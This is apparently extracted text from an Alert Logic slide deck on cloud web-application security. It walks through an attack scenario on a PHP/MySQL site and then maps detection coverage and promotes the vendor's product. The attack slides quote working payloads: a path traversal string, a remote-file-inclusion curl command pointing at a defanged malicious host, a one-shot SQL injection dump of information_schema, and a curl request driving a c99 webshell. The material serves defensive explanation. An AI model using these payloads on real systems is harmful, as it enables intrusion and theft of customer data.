6. Tame the Beast
Industry Challenge: The Good, the Bad and the Ugly
Known Good
Known Bad
Suspicious
Allow
Identify | Tune | Permit
Block
Drop | Reconfigure
Application Stack
Web Apps
Server-side Apps
App Frameworks
Dev Platforms
Databases
Server OS
Hypervisor
Hardware Classification Action
HUMAN EXPERT
REQUIRED
7. Classic 3-Tier Web Application Key Target Assets
Key target assets for attack
Across the Full Stack
1. Custom application
2. Web server implementation
Apache, IIS, NGINGX
3. Application server implementation
Tomcat, Jboss, Jetty, ASP
4. Web server frameworks and
languages
Struts, PHP, Java
5. Databases
mySql, Oracle, MSSQL,..
6. Azure Services
VMs, Storage
Azure VMs
Azure VMs
VNET
Traffic
Manager
Users Internet
gateway
Load
Balancers
DB instance
DB instance
AvailabilityzoneAAvailabilityzoneB
VMScale
Sets
Web App Server
VMScale
Sets
Storage
Blob
Azure VMs
Azure VMs
8. An attack scenario - Recon
VNET
Traffic Manager
Internet
gateway
LB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
Storage
Bastion
Host
PHP
Application
On Linux
1 – Performs low-frequency app-scan
2 – Tests path traversal and enumerates directories
3 – Tests remote file inclusion
Recon
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely
mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=..
/../../../etc
• Path traversal is successful. Attacker
enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious
[dot] com/test.php' http [://] mysite [dot]
com/wp-content/plugins/site-
import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app,
prone to both smash’n grab attacks as more
persistent attack approaches
9. Entry and data exfiltration
• Attacker launches a series of SQL-I injection discovery
attempts
• Gets a dump-in-one-shot attack and gets full table return
http://victim.com/report.php?id=23 and(select (@a) from
(select(@a:=0x00),(select (@a) from (information_schema.schemata)where
(@a)in (@a:=concat(@a,schema_name,'<br>'))))a)
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
An attack scenario – opportunistic exfiltration
VNET
Traffic Manager
Internet
gateway
LB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
Storage
Bastion
Host
PHP
Application
On Linux
4 - SQL-I data extraction attack
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability
Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http
[://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php>
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
Entry/Exfil
10. VNET
Traffic Manager
Internet
gateway
LB
mySQL instance
On linux
AvailabilityzoneAAvailabilityzoneB
Storage
Bastion
Host
PHP
Application
On Linux
5 - Webshell injection
6 - Commanding through Shell
Command and control (C&C)
• Attacker uploads c99 webshell via RFI vulnerability
• Persistent foothold for lateral movement established
curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64='
-F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F
'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http
[://] mysite [dot] com/path/to/c99
Attacker achievements: obtained foothold for further action and lateral
movement
Entry and data exfiltration
• Attacker launches a series of SQL-I injection attempts
• Gets a dump-in-one-shot attack and gets full table return
Attacker achievements: obtained sensitive customer-data without need for local
process or system breaches on servers
Recon
• low slow application level scan
• Attacker learns PHP app, on linux, likely mySql DB
• Suspects vulnerabilities
• tests potential path traversal vulnerability
/bWAPP/directory_traversal_2.php?directory=../../../../etc
• Path traversal is successful. Attacker enumerates server directories.
• tests remote file inclusion vulnerability (RFI)
Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks
as more persistent attack approaches
An attack scenario – persistent foothold
Command and control
11. Deep
Application
threat visibility
Network inspection
Expert
SOC
Analysis of
Findings
Network,
system,
application
infrastructure
threat visibility
Alert Logic’s Approach
AuditLogs
Config&VulnAssessment Foundation
Asset and
exposure
visibility
Log Collection
HTTP Inspection
Expert
Curation,
R&D of
Content and
Intel
Analytics
and
Machine
Learning
Content
and
Intel
Application
level Web
Attacks
OWASP Top
10
Attacks against
vulnerable
platforms and
libraries
Attacks against
miscon-
figurations
12. Coverage needed for this scenario
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Recon
Entry
Exfil
C&COverall combined
coverage scorecard
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
How much can we see?
AuditLogs
13. Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Recon
Entry
Exfil
C&C
AuditLogs
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
14. Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Recon
Entry
Exfil
C&C
Network inspection
AuditLogs
Config&VulnAssessment
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
15. Deep
Application
threat visibility
Network,
system,
application
infrastructure
threat visibility
Coverage needed for this scenario
Foundation
Asset and
exposure
visibility
Low
slow
scan
Path
traver
sal
RFI SQLi
Web
shell
Config and vulnerability
assessment will reveal
vulnerabilities present
that attackers can exploit.
Actual attacks in motion
can not be detected with
vuln and config scanning
Network inspection
providers visibility on
attacker actions on the
known vulnerabilities
exploited in the attack
and their success
Deep HTTP inspection
on requests and
responses, learning and
anomaly detection
deepens coverage for
whole classes of
application attacks
Recon
Entry
Exfil
C&C
Network inspection
AuditLogs
Config&VulnAssessment
Log Collection
HTTP
Inspection
Overall combined
coverage
No coverage
Vulnerability coverage only
Basic Threat Coverage
Deep threat coverage
16. SECURITY
EXPERTS
Integrated Security Model
Incident
Investigation
System
Visual | Context | Hunt
Data & Event
Sources
Assets | Config | Logs
Automatic
Detection
Block | Alert | Log
ML Algorithms
Rules & Analytics
Security
Researchers
Data
Scientists
Software
Programmers
Integrated: Infrastructure | Content | Human Experts
Security
Analysts
17. We designed security for cloud and hybrid environments
GET STARTED IN MINUTES
MAINTAIN COVERAGE AT
CLOUD SCALE
KEEP PRODUCTION FLOWING
with modular services that
grow with you
Comply
with integration to cloud APIs
and DevOps automation
with auto-scaling support and
out-of-band detection
Single pane of glass for workload and application security
across cloud, hosted & on-premises
18. Leaders
28
8
6
4
10
25
3
5
5
11
8
10
15
24
Other
Amazon
Check Point
Chronicle Data
Cisco
Fortinet
Intel Security
Okta
Symantec
Barricade
JumpCloud
Evident.io
Palerra
Microsoft
CloudPassage
CloudCheckr
FortyCloud
ThreatStack
Alert Logic
A recognized security leader
“Alert Logic has a
head start in the cloud,
and it shows.”
PETER STEPHENSON
SC Magazine review
“…the depth and breadth
of the offering’s analytics
and threat management
process goes beyond
anything we’ve seen…”Who is your primary
in-use vendor for Cloud
Infrastructure Security?
Who are the top vendors
in consideration for Cloud
Infrastructure Security?
Alert Logic